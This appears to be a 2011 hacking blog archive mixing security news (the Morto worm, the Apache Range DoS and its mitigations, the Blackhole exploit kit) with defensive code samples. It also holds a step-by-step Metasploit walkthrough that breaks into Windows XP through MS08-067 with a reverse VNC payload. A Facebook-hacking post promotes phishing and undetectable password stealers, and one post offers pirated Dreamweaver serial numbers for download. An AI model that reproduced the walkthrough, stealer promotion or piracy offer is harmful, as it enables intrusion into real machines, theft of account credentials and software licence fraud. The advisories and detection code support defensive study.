Monday, August 29, 2011

Morto Worm Leaves Windows RDP At Risk


RDP stands for Remote Desktop Protocol. It runs over TCP port 3389 and lets a user control the desktop of another computer; RDP is mostly used in organizations and business environments. According to a report by F-Secure, a new worm named Morto is the cause behind a recent spike in traffic to TCP port 3389 (the port used by RDP).




How Does The Morto Worm Work?


Morto works by first infecting a single machine that has Remote Desktop enabled. Once that machine is infected, the worm scans the network for other computers with Remote Desktop, in technical terms for hosts listening on port 3389. When it finds a target, it tries to log in to those Remote Desktop hosts using a list of common default passwords. Here is the list of passwords which Morto tries:

*1234
0
111
123
369
1111
12345
111111
123123
123321
123456
168168
520520
654321
666666
888888
1234567
12345678
123456789
1234567890
%u%
%u%12
1234qwer
1q2w3e
1qaz2wsx
aaa
abc123
abcd1234
admin
admin123
letmein
pass
password
server
test
user

As you can see from the password list above, Morto uses a very basic dictionary attack to compromise remote desktops. The worm also creates several new files, including DLL and TXT files. As reported by F-Secure:

The infection will create several new files on the system including \windows\system32\sens32.dll and \windows\offline web pages\cache.txt
Morto can be controlled remotely. This is done via several alternative servers, including jaifr.com and qfsl.net
We've seen several different samples. Some MD5 hashes include:
0c5728b3c22276719561049653c71b84
14284844b9a5aaa680f6be466d71d95b

The worm could get far more devastating if brute-forcing support were enabled, or if a tool like Ncrack were integrated into it. Ncrack is a very powerful RDP cracker, but it is sometimes slow and works only against vulnerable machines.


By now you might have figured out the solution to this problem yourself; if not, it's simple: use strong passwords.
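To put the "use strong passwords" advice into practice, here is an added example in Python (my illustration, not part of the F-Secure report and not the worm's own code). It checks whether an account's password is in the dictionary listed above, reading the %u% entry as a stand-in for the account name (that reading is an assumption), and it scans a few constructed failed-logon records, in a made-up one-line text format, for the burst of RDP logon failures from a single source that a Morto-style scan produces.

```python
import re
from collections import defaultdict
from datetime import datetime

# The password dictionary Morto tries, as listed in the F-Secure report above.
# The list's "%u%" and "%u%12" entries are read here as "the account name"
# and "the account name followed by 12" (an assumption, handled in code below).
MORTO_PASSWORDS = {
    "*1234", "0", "111", "123", "369", "1111", "12345", "111111", "123123",
    "123321", "123456", "168168", "520520", "654321", "666666", "888888",
    "1234567", "12345678", "123456789", "1234567890", "1234qwer", "1q2w3e",
    "1qaz2wsx", "aaa", "abc123", "abcd1234", "admin", "admin123", "letmein",
    "pass", "password", "server", "test", "user",
}


def is_morto_guessable(username, password):
    """True if the worm's dictionary would hit this account's password."""
    p = password.lower()
    u = username.lower()
    return p in MORTO_PASSWORDS or p == u or p == u + "12"


# Constructed log format for the demo (not a real Windows export):
#   <date> <time> EventID=<id> LogonType=<n> TargetUser=<name> SourceIP=<ip>
# Event 4625 is a failed logon; logon type 10 is RemoteInteractive (RDP).
LOG_LINE = re.compile(
    r"^(?P<ts>\S+ \S+) EventID=(?P<eid>\d+) LogonType=(?P<lt>\d+) "
    r"TargetUser=(?P<user>\S+) SourceIP=(?P<ip>\S+)$"
)


def find_rdp_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {source_ip: failures} for every source that produced at least
    `threshold` failed RDP logons inside any span of `window_seconds`."""
    attempts = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m or m["eid"] != "4625" or m["lt"] != "10":
            continue  # not a failed RDP logon
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        attempts[m["ip"]].append(ts)

    hits = {}
    for ip, times in attempts.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):  # sliding window over sorted times
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits[ip] = best
    return hits


# Constructed sample: 10.0.0.5 walks the dictionary against several accounts
# within seconds; 10.0.0.9 is a user mistyping twice; 10.0.0.7 is not RDP.
SAMPLE_LOG = """\
2011-08-28 10:00:01 EventID=4625 LogonType=10 TargetUser=administrator SourceIP=10.0.0.5
2011-08-28 10:00:03 EventID=4625 LogonType=10 TargetUser=administrator SourceIP=10.0.0.5
2011-08-28 10:00:05 EventID=4625 LogonType=10 TargetUser=admin SourceIP=10.0.0.5
2011-08-28 10:00:08 EventID=4625 LogonType=10 TargetUser=admin SourceIP=10.0.0.5
2011-08-28 10:00:12 EventID=4625 LogonType=10 TargetUser=user SourceIP=10.0.0.5
2011-08-28 10:00:15 EventID=4625 LogonType=10 TargetUser=user SourceIP=10.0.0.5
2011-08-28 10:00:20 EventID=4624 LogonType=10 TargetUser=user SourceIP=10.0.0.5
2011-08-28 10:00:30 EventID=4625 LogonType=10 TargetUser=alice SourceIP=10.0.0.9
2011-08-28 10:05:30 EventID=4625 LogonType=10 TargetUser=alice SourceIP=10.0.0.9
2011-08-28 10:06:00 EventID=4625 LogonType=3 TargetUser=svc SourceIP=10.0.0.7
""".splitlines()

if __name__ == "__main__":
    print(find_rdp_bruteforce(SAMPLE_LOG))          # {'10.0.0.5': 6}
    print(is_morto_guessable("administrator", "Admin123"))  # True
```

The successful 4624 event that follows the burst from 10.0.0.5 is exactly the pattern to alert on: a run of failures from one address and then a logon. The dictionary check is the cheap preventive control; running it against the accounts that are allowed to log on over RDP removes the worm's entire attack surface.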

Zero Day DOS Vulnerability In Apache Leaves Half Of Internet Vulnerable



A few days ago a massive DoS vulnerability was found in Apache versions 1.3 and 2.x, leaving more than 50% of the internet vulnerable to a DoS attack. This DoS attack is so powerful that a single computer can take down a whole server. A new tool named Apache Killer has been observed in active use in the wild.


According to Apache:

Apache HTTPD Security ADVISORY
==============================
Title: Range header DoS vulnerability Apache HTTPD 1.3/2.x
CVE: CVE-2011-3192:
Date: 20110824 1600Z
Product: Apache HTTPD Web Server
Versions: Apache 1.3 all versions, Apache 2 all versions
Description:
============
A denial of service vulnerability has been found in the way the multiple
overlapping ranges are handled by the Apache HTTPD server:
http://seclists.org/fulldisclosure/2011/Aug/175

An attack tool is circulating in the wild. Active use of this tool has
been observed.
The attack can be done remotely and with a modest number of requests can
cause very significant memory and CPU usage on the server.

The default Apache HTTPD installation is vulnerable.
There is currently no patch/new version of Apache HTTPD which fixes this
vulnerability. This advisory will be updated when a long term fix
is available.

A full fix is expected in the next 48 hours.


Apache Killer

Apache Killer is a DoS/DDoS tool written in Perl which sends HTTP GET requests whose Range header asks for a large number of byte ranges. Serving each of these overlapping ranges costs the server memory and CPU, so a modest number of such requests is enough to make Apache malfunction.

Currently there is no patch released by Apache for this issue; however, Apache has suggested some immediate mitigation steps, which are as follows:

Mitigation:
============
However there are several immediate options to mitigate this issue until
a full fix is available:
1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then
either ignore the Range: header or reject the request.
Option 1: (Apache 2.0 and 2.2)
# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range
# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range
Option 2: (Also for Apache 1.3)
# Reject request when more than 5 ranges in the Range: header.
# CVE-2011-3192
#
RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* - [F]
The number 5 is arbitrary. Several 10's should not be an issue and may be
required for sites which for example serve PDFs to very high end eReaders
or use things such as complex http based video streaming.
2) Limit the size of the request field to a few hundred bytes. Note that while
this keeps the offending Range header short - it may break other headers;
such as sizeable cookies or security fields.

LimitRequestFieldSize 200
Note that as the attack evolves in the field you are likely to have
to further limit this and/or impose other LimitRequestFields limits.
See: http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
3) Use mod_headers to completely dis-allow the use of Range headers:
RequestHeader unset Range

Note that this may break certain clients - such as those used for
e-Readers and progressive/http-streaming video.
4) Deploy a Range header count module as a temporary stopgap measure:
http://people.apache.org/~dirkx/mod_rangecnt.c
Precompiled binaries for some platforms are available at:
http://people.apache.org/~dirkx/BINARIES.txt
5) Apply any of the current patches under discussion - such as:
http://mail-archives.apache.org/mod_mbox/httpd-dev/201108.mbox/%3cCAAPSnn2PO-d-C4nQt_TES2RRWiZr7urefhTKPWBC1b+K1Dqc7g@mail.gmail.com%3e
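As an added illustration (my code, not from the advisory or the Apache project), the following Python mirrors what the Option 1 and Option 2 rules above actually do to a Range header value, so you can check how your own traffic would be classified before deploying them. The sample header values are constructed.

```python
import re

# Mirrors "SetEnvIf Range (,.*?){5,} bad-range=1": matches a Range value
# containing five or more commas, i.e. six or more range specs.
SETENVIF_BAD_RANGE = re.compile(r"(,.*?){5,}")

# Mirrors "RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)":
# the header is acceptable only when it is absent/empty or is "bytes="
# followed by at most five comma-separated range specs. The leading "!" in
# the RewriteCond means the rule fires (403) when this pattern does NOT match.
REWRITE_OK_RANGE = re.compile(r"^bytes=[^,]+(,[^,]+){0,4}$|^$")


def count_ranges(range_header):
    """Number of range specs in a Range header value ('' -> 0)."""
    value = range_header.strip()
    if not value:
        return 0
    _, _, specs = value.partition("=")
    return len([s for s in specs.split(",") if s.strip()])


def drop_range_option1(range_header):
    """Option 1 (mod_setenvif + mod_headers): return the header value to keep,
    or None when "RequestHeader unset Range env=bad-range" would remove it."""
    return None if SETENVIF_BAD_RANGE.search(range_header) else range_header


def reject_option2(range_header):
    """Option 2 (mod_rewrite): True when "RewriteRule .* - [F]" would answer 403."""
    return REWRITE_OK_RANGE.search(range_header) is None


def classify(range_header):
    """Summarise how both options treat one header value."""
    return {
        "ranges": count_ranges(range_header),
        "option1_dropped": drop_range_option1(range_header) is None,
        "option2_rejected": reject_option2(range_header),
    }


if __name__ == "__main__":
    # Constructed samples: a normal resume request, the five-range boundary,
    # one range over it, and a long comma-separated list of the kind the
    # advisory is about.
    for value in ("bytes=0-99",
                  "bytes=0-1,2-3,4-5,6-7,8-9",
                  "bytes=0-1,2-3,4-5,6-7,8-9,10-11",
                  "bytes=" + ",".join("0-" for _ in range(40))):
        print(value[:40], classify(value))
```

Both rules draw the line at five ranges: with five, the SetEnvIf pattern sees only four commas and the RewriteCond pattern still matches, so the request passes; with six, Option 1 strips the header and serves the whole file while Option 2 refuses the request outright. If your site legitimately needs more ranges (the advisory's eReader and video-streaming cases), raise the 5 in the SetEnvIf pattern and the 4 in the RewriteCond pattern together, since the second is one less than the first.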


Apache Killer In Action

Friday, August 26, 2011

Android Is The Number 1 Target Of Hackers


If you are an Android user, you could be the next victim of hackers. According to a report by McAfee, Google Android has become the number one target of hackers. The McAfee report also says that the recent attacks by the hacktivist groups Anonymous and LulzSec helped drive a massive increase in online attacks.
According to the threat report, the reason Google Android is the number one target is that Google does not monitor the active distribution of mobile apps. As a result, Android users are falling victim to massive malware attacks.


What kind of Malware is being distributed?

According to the McAfee report, the Android malware takes over the identity of the Android user, resulting in an identity-theft attack. Once the malware has been installed, the hacker has complete access to any kind of information, including personal data, GPS logs, and carrier and billing code information.

According to Dave Marcus, Director of McAfee Security Labs:
“There is malware ending up on Android phones that is coming out of China and is being used to steal the identity of Android users. Once hackers take control of an Android device, they have access to any kind of information on there including personal data, GPS logs and carrier and billing code information.”
According to me, the reason Android is being targeted the most is that most Android users do not bother to use any antivirus at all, or if they do use one, they do not update it. As a result, it becomes fairly easy for hackers to promote and distribute malware. I don't think that any zero-days are being used; a simple trojan with a little code obfuscation is being used to bypass antiviruses.

How Can I Protect Myself From Android Malware?

It's simple: install a good antivirus and update it regularly. New malware comes out every day, so make sure your antivirus is up to date. Also avoid downloading any untrusted mobile apps you are not sure about. It would be wise to do a little research on Google before installing any app.

You can download the Mcafee report by clicking here

Saturday, August 20, 2011

Advanced SQL Injection - Defcon 17


According to the OWASP Top 10 of 2010, SQL injection is the most dangerous and most common vulnerability around. A SQL injection vulnerability occurs due to improper input validation or no input validation at all; what I mean by improper or no input validation is that user input is not filtered (for escape characters) before it gets passed to the SQL database. A SQL injection attack can take many forms, but it is usually categorized into three types:

1. Inband
2. Out of band
3. Inferential

While browsing the internet, I came across an excellent presentation on advanced SQL injection techniques by John McCray. In this presentation, John McCray discusses advanced SQL injection methods and topics such as IDS evasion, filter bypassing, etc.
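As an added example (my code, not from the presentation), here is the root cause described above in runnable Python against an in-memory SQLite database: the same lookup built by string concatenation and with a bound parameter, so you can see what "user input passed to the database unfiltered" actually changes. The table and its rows are constructed for the demo.

```python
import sqlite3


def make_db():
    """Constructed sample data: three accounts in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (name, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def lookup_unsafe(conn, name):
    """No input validation: the user's text becomes part of the SQL itself,
    so a quote character in `name` ends the string literal and whatever
    follows is executed as SQL (the in-band case from the list above)."""
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Parameterised query: the driver sends the value separately from the
    query text, so it can only ever be compared as data, never parsed as SQL."""
    return conn.execute(
        "SELECT name, role FROM users WHERE name = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    hostile = "x' OR '1'='1"
    print(lookup_unsafe(db, "bob"))      # [('bob', 'user')]
    print(lookup_unsafe(db, hostile))    # every row: the WHERE clause is now always true
    print(lookup_safe(db, hostile))      # []: no user is literally named "x' OR '1'='1"
```

Escaping quote characters, as the text above mentions, is the older fix and is easy to get wrong per database; binding parameters removes the problem structurally, because the query text is fixed before any user data is attached to it.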


Wednesday, August 17, 2011

Apple Store Down, Hacked?


Well, currently the Apple Store is down in lots of countries. A rumor is floating around that it has been hacked or is the victim of a DDoS attack, which makes people wonder whether the hacktivist group Anonymous might be behind it. Usually whenever the Apple Store is down, Apple follows with a new product launch; however, if that were the case and Apple were planning a new product launch, the Apple Store should have been down in all the other countries too.


According to a ping test which I ran on the Apple Store, it is down in a few countries whereas it's accessible in others, which leaves the possibility of a DDoS attack. Here is a screenshot of Apple's App Store; as you can see, it's down and inaccessible.


Here is the screenshot of the just-ping scan, which shows that Apple's store is down in lots of countries, with packet loss over 40% in some countries.


We will update you, as soon as we get more information on apple store's status.

Friday, August 12, 2011

Top 10 Ways How Hackers Can Hack Facebook Accounts In 2011

Facebook is one of the most widely used social networking sites, with more than 750 million users, and as a result it has become the number one target of hackers. I have written a couple of posts related to Facebook hacking here at RHA. In my previous post from 2010 on Facebook hacking and security, 4 Ways on How to Hack Facebook Password, I covered the top methods used by hackers to hack Facebook accounts; however, lots of things have changed in 2011. Lots of methods have become outdated or have been patched by Facebook, and lots of new methods have been introduced, so in this post I will write up the top 10 methods hackers use to hack Facebook accounts in 2011.


10 Ways How Hackers Can Hack Facebook Accounts In 2011

So here are the top 10 methods which have been the most popular in 2011:


1. Facebook Phishing 




Phishing is still the most popular attack vector used for hacking Facebook accounts. There are a variety of ways to carry out a phishing attack. In a simple phishing attack, a hacker creates a fake login page that looks exactly like the real Facebook page and then lures the victim into logging in on that page. Once the victim logs in through the fake page, the victim's email address and password are stored in a text file; the hacker then downloads the text file and gets his hands on the victim's credentials.

I have explained the step by step phishing process in my post below:

2. Keylogging 

Keylogging, according to me, is the easiest way to hack a Facebook password. Keylogging can sometimes be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which, once installed on the victim's computer, records everything the victim types on his/her computer. The logs are then sent back to the attacker either by FTP or directly to the hacker's email address. I have dedicated half of my newest book, "An Introduction to Keyloggers, RATs and Malware", to this topic.

3. Stealers 



Almost 80% of people use passwords stored in their browser to access Facebook. This is quite convenient but can sometimes be extremely dangerous. Stealers are software specially designed to capture the saved passwords stored in the victim's browser; stealers, once FUD (fully undetectable by antivirus), can be extremely powerful. If you want to know how stealers work and how to set up your own, kindly refer to the book above.


4. Session Hijacking




Session hijacking can be very dangerous if you are accessing Facebook over an http:// connection. In a session hijacking attack, a hacker steals the victim's browser cookie, which is used to authenticate the user on a website, and uses it to access the victim's account. Session hijacking is widely used on LANs. I have already written a three-part series on how session hijacking works and also a separate post on Facebook session hijacking.


5. Sidejacking With Firesheep


Sidejacking attacks became common in late 2010, but they are still popular nowadays. Firesheep is widely used to carry out sidejacking attacks; Firesheep only works when the attacker and victim are on the same Wi-Fi network. A sidejacking attack is basically another name for HTTP session hijacking, but it is more targeted towards Wi-Fi users.

To know more about sidejacking attacks and Firesheep, read the post mentioned below:

6. Mobile Phone Hacking



Millions of Facebook users access Facebook through their mobile phones. If a hacker can gain access to the victim's mobile phone, he can probably gain access to his/her Facebook account. There are lots of mobile spying applications used to monitor a cellphone.

The most popular mobile phone spying applications are:

1. Mobile Spy
2. Spy Phone Gold

7. DNS Spoofing 


If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack to replace the original facebook.com page with his own fake page and hence gain access to the victim's Facebook account.




8. USB Hacking 

If an attacker has physical access to your computer, he could just insert a USB stick programmed to automatically extract the passwords saved in the browser. I have also posted about this attack, which you can read by accessing the link below:
9. Man In the Middle Attacks


If the victim and attacker are on the same LAN on a switched network, a hacker can place himself between the client and the server, or act as the default gateway, and hence capture all the traffic in between. ARP poisoning, which is the other name for man-in-the-middle attacks, is a very broad topic and beyond the scope of this article. We have written a couple of articles on man-in-the-middle attacks which can be accessed from the links mentioned below:
If you are really interested in learning how man-in-the-middle attacks work, you can view the presentation below by oxid.it.

10. Botnets 


Botnets are not commonly used for hacking Facebook accounts because of their high setup costs; they are used to carry out more advanced attacks. A botnet is basically a collection of compromised computers. The infection process is the same as for keylogging, but a botnet gives the attacker additional options for carrying out attacks with the compromised computers. Some of the most popular botnets include SpyEye and Zeus.
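Items 4 and 5 above (session hijacking and sidejacking) both come down to a session cookie travelling over plain HTTP. From the defender's side, the thing to check is whether a site marks its session cookies Secure (the browser will never send them over http://) and HttpOnly (page scripts cannot read them). The following is an added example, my code rather than part of this post, that audits a few constructed Set-Cookie headers for those two attributes:

```python
def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attribute: value}).
    Attribute names are lower-cased; flag attributes map to ''."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_set_cookies(set_cookie_headers):
    """Return {cookie_name: [missing attributes]} for every cookie that lacks
    Secure or HttpOnly. Cookies that carry both are omitted from the result."""
    findings = {}
    for header in set_cookie_headers:
        name, _, attrs = parse_set_cookie(header)
        missing = []
        if "secure" not in attrs:
            missing.append("Secure")     # will be sent in clear over http://
        if "httponly" not in attrs:
            missing.append("HttpOnly")   # readable by any script on the page
        if missing:
            findings[name] = missing
    return findings


# Constructed responses for the demo: a session cookie without Secure,
# a preference cookie done right, and a tracking cookie with neither flag.
SAMPLE_SET_COOKIE = [
    "sid=abc123; Path=/; HttpOnly",
    "pref=dark; Path=/; Secure; HttpOnly",
    "track=xyz; Path=/",
]

if __name__ == "__main__":
    for cookie, missing in audit_set_cookies(SAMPLE_SET_COOKIE).items():
        print(f"{cookie}: missing {', '.join(missing)}")
```

The cookie named sid is the one that matters in the attacks above: without Secure, a user who types the site's address without https:// sends it in the clear, which is all a sniffer on the same LAN or Wi-Fi needs. The same function can be pointed at the Set-Cookie headers of any site you operate.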


Facebook Hacking Course




Facebook Hacking Course is a Facebook security course created by me which tells you exactly how hackers can compromise your Facebook account and what you can do to protect your Facebook account from getting hacked.

Click here to get access to the course

Hope you enjoyed reading the post as much as I enjoyed writing it.

Note: Copying or reproducing this article is strictly prohibited and will lead to consequences. If you are reproducing or copying this article, make sure that you give proper credit.

Was Myspace Hacked On Friday? - Http/1.1 service unavailable


Early Friday morning MySpace shocked its users when the MySpace homepage showed a mysterious message. Lots of people thought the Anonymous hacktivist group might be behind this attack. Whenever a visitor came to the MySpace homepage, the following message was displayed:

We messed up our code so bad that even puppies and kittens may be in danger. Please turn back …now.* Have your pet spayed or neutered.

Lots of people thought that MySpace had been hacked and the hackers had replaced the MySpace website with this custom error page; however, MySpace has been using this error message since 2009, and it is shown because of internal errors.

Wednesday, August 10, 2011

Facebook Will Be Down On November 5 Says Anonymous


Well, here is another shocking piece of news: the famous hacktivist group Anonymous claims that they will take down Facebook on November 5. The huge attack is aimed at destroying Facebook. The Anonymous hacking group has posted a video in which they explain why they will attack Facebook.

Is it really Possible?


Well, the attack which Anonymous will probably use is a DDoS attack. With Facebook having so many servers, it is extremely difficult to take Facebook down, but considering the number of compromised servers Anonymous has under its control, it is possible that Anonymous could create a huge denial-of-service attack that prevents users from accessing the website for minutes to hours. One server is equal in power to almost 3000 PCs; according to sources, the Anonymous hacking group has thousands of servers under its control, so there is a possibility that they can pull off a huge DDoS attack to take down all of Facebook.

The group calls the November 5 operation "Operation Facebook". Here is the official press release:

Operation Facebook
DATE: November 5, 2011.
TARGET: https://facebook.com
Press:
Twitter : https://twitter.com/OP_Facebook
http://piratepad.net/YCPcpwrl09
Irc.Anonops.Li #OpFaceBook
Message:
Attention citizens of the world,
Facebook has been selling information to government agencies and giving clandestine access to information security firms so that they can spy on people from all around the world. Some of these so-called whitehat infosec firms are working for authoritarian governments, such as those of Egypt and Syria.
Everything you do on Facebook stays on Facebook regardless of your "privacy" settings, and deleting your account is impossible, even if you "delete" your account, all your personal info stays on Facebook and can be recovered at any time. Changing the privacy settings to make your Facebook account more "private" is also a delusion. Facebook knows more about you than your family. 
http://www.physorg.com/news170614271.html
http://itgrunts.com/2010/10/07/facebook-steals-numbers-and-data-from-your-iph….
You cannot hide from the reality in which you, the people of the internet, live in. Facebook is the opposite of the Antisec cause. You are not safe from them nor from any government. One day you will look back on this and realise what we have done here is right, you will thank the rulers of the internet, we are not harming you but saving you. 
The riots are underway. It is not a battle over the future of privacy and publicity. It is a battle for choice and informed consent. It’s unfolding because people are being raped, tickled, molested, and confused into doing things where they don’t understand the consequences. Facebook keeps saying that it gives users choices, but that is completely false. It gives users the illusion of and hides the details away from them "for their own good" while they then make millions off of you. When a service is "free," it really means they’re making money off of you and your information.
Think for a while and prepare for a day that will go down in history. November 5 2011, #opfacebook . Engaged. 
This is our world now. We exist without nationality, without religious bias. We have the right to not be surveilled, not be stalked, and not be used for profit. We have the right to not live as slaves. 
We are anonymous
We are legion
We do not forgive
We do not forget
Expect us

Video




Update

The Anonymous leader has confirmed via his Twitter account that the news was fake. Here is what he tweeted:


Tuesday, August 9, 2011

Armitage And Metasploit Video Training Course

In my previous post, Attacking Windows XP SP2 With Metasploit, I wrote a step-by-step guide on how to attack a Windows XP host with Metasploit. Metasploit is a great penetration testing tool; however, there are a couple of other tools which can make using Metasploit much easier. One of the popular tools is Armitage. As defined by its authors: "Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Advanced users will find Armitage valuable for managing remote Metasploit instances and collaboration. Armitage's red team collaboration features allow your team to use the same sessions, share data, and communicate through one Metasploit instance."

A few weeks back the author of Armitage, Raphael Mudge, created a six-part video series which explains almost every aspect of using Armitage in a penetration test. I recently came across the video series and thought I would share it with my readers.


The six parts of the series are:

1. Introduction
2. Metasploit
3. Access
4. Post-Exploitation
5. Maneuver
6. Team Tactics
If you have any questions, feel free to ask.


Saturday, August 6, 2011

Attacking Windows XP SP2 With Metasploit


In the previous post related to Metasploit, "How To Use A Keylogger Inside Metasploit Using Meterpreter?", I explained an easy way to use a keylogger inside Meterpreter in order to capture the victim's keystrokes. However, after writing that article I received some comments which disappointed me a lot: readers were asking questions like "What is Metasploit?" and "What is Meterpreter?", so I decided not to jump into advanced topics before covering the basics.

In this article I will show you how to use the ms08_067_netapi exploit against an unpatched Windows XP machine to gain access to it. The original name of the exploit is "Microsoft Server Service Relative Path Stack Corruption"; this exploit is capable of bypassing NX on various operating systems and service packs. Before we jump into the actual exploitation process, I would suggest taking some time to look at the exploit code here.

Requirements

1. BackTrack 5
2. Windows XP SP2 Operating System

We will perform this attack on an unpatched Windows XP operating system. I strongly recommend that you try it in a safe environment; using these methods in a public environment is definitely a crime.

Windows XP SP2 Setup

Before we attack the Windows XP OS, we want to make sure that it is vulnerable, so before attacking, change the following settings:

1. Disable the firewall completely.
2. Disable antivirus, if any.
3. Turn off "Automatic Updates".


Attacking A Windows XP Host With Metasploit

So here is how we will hack into the Windows XP machine using the Metasploit Framework. If you are unfamiliar with Metasploit basics, consider reading our post, Metasploit Framework Explained For Beginners.

Step 1 - First of all, turn on your BackTrack 5 virtual machine.

Step 2 - Next, on your console type "msfconsole". This will load the Metasploit Framework.

Step 3 - Next, type the command "show exploits". This will list all the exploits currently in Metasploit.

Step 4 - Next, issue the "search netapi" command in the console. This command will search for all exploit modules matching the pattern "netapi".

Step 5 - Next, type "use windows/smb/ms08_067_netapi" in the console.

Step 6 - Now that the exploit has been selected, you need to set RHOST with "set RHOST <IP address>"; RHOST is the IP address of the victim. You can get the Windows host's IP by issuing the "ipconfig" command in its command prompt.

Step 7 - Once the exploit is set up, it's time to set a payload. In this case we will use a VNC inject payload: issue the set payload windows/vncinject/reverse_tcp command in the console. Next, set the proper LHOST, which for a reverse_tcp payload is the IP address of your BackTrack machine, by issuing set LHOST <IP address>.

Step 8 - Next, issue the command "show options" to check that everything is set up correctly.

Step 9 - Once you are done with that check, just type "exploit" in the console. If you followed the steps correctly, you will have a VNC session open on the victim's computer.



If you have any questions, feel free to ask.

CounterMeasures

1. Make sure your firewall is turned on.
2. Make sure you have installed the latest updates, in particular the MS08-067 security update that closes this hole.

Friday, August 5, 2011

Adobe Dreamweaver CS5 Serial Numbers

Adobe Dreamweaver is a very powerful web development tool; its powerful features have made it the number one choice of developers and designers.


I Can't Really Afford To Buy Dreamweaver CS5!
As with every Adobe product, we have extremely powerful tools at our disposal, but sadly all of this comes with a nasty price tag :( Setting you back anything up to $1000, Dreamweaver CS5 isn't always an affordable solution.

If you are wondering where to get free Adobe Dreamweaver CS5 serial numbers, then you are in the right place. Fortunately we have the solution for you: we have compiled a list of all the working Adobe Dreamweaver CS5 serial numbers and packed them into a file. So what are you waiting for? Go and grab your Dreamweaver CS5 serial keys from the link below:

Download Adobe Dreamweaver CS5 Serial Numbers here

Thursday, August 4, 2011

Black Hole Exploit Kit - A Deadly Russian Crimeware

Russian hackers have a very strong history in malware development; in fact, Russian hackers currently own the world's most dangerous malware. One of the most dangerous and popular pieces of malware is the "Black Hole Exploit Kit". The Blackhole exploit kit is basically a collection of tons of browser exploits which take advantage of vulnerabilities in the user's browser in order to infect the computer.



How Does It Work?

Whenever a user visits an otherwise clean website into which a malicious iframe has been injected, the iframe redirects the user to the Blackhole exploit server, which then fires all its well-known exploits at the victim's browser and gives remote access to the attacker.

Cost

The annual license for the Blackhole exploit kit costs around $1500, the semi-annual license costs $700 and the quarterly license costs $700. The author also gives you the option to rent the exploit kit, and you can host the exploit kit on the author's server for a small fee.

Monday, August 1, 2011

Backtrack 5R1 Arriving On 10th August

Well, here is another exciting piece of news for all penetration testers and BackTrack lovers: BackTrack will launch BackTrack 5 R1 (Release 1) on 10th August. According to the Offensive Security team, BackTrack 5 R1 will come with around 100 bug fixes and, in addition, will also include over 30 new tools and numerous package updates.

According to the Offensive Security team:
We have a few exciting items to announce in the upcoming month, one of them being BackTrack 5 R1 (Release one) which will be available for download on the 10th of August, 2011. This will complete our first 3 month cycle since the last release. With over 100 bug fixes, numerous package updates and the addition of over 30 new tools and scripts – BackTrack 5 R1 will rock. We will have a pre-release event of BackTrack 5 R1 at the BlackHat / Defcon Conference a few days earlier.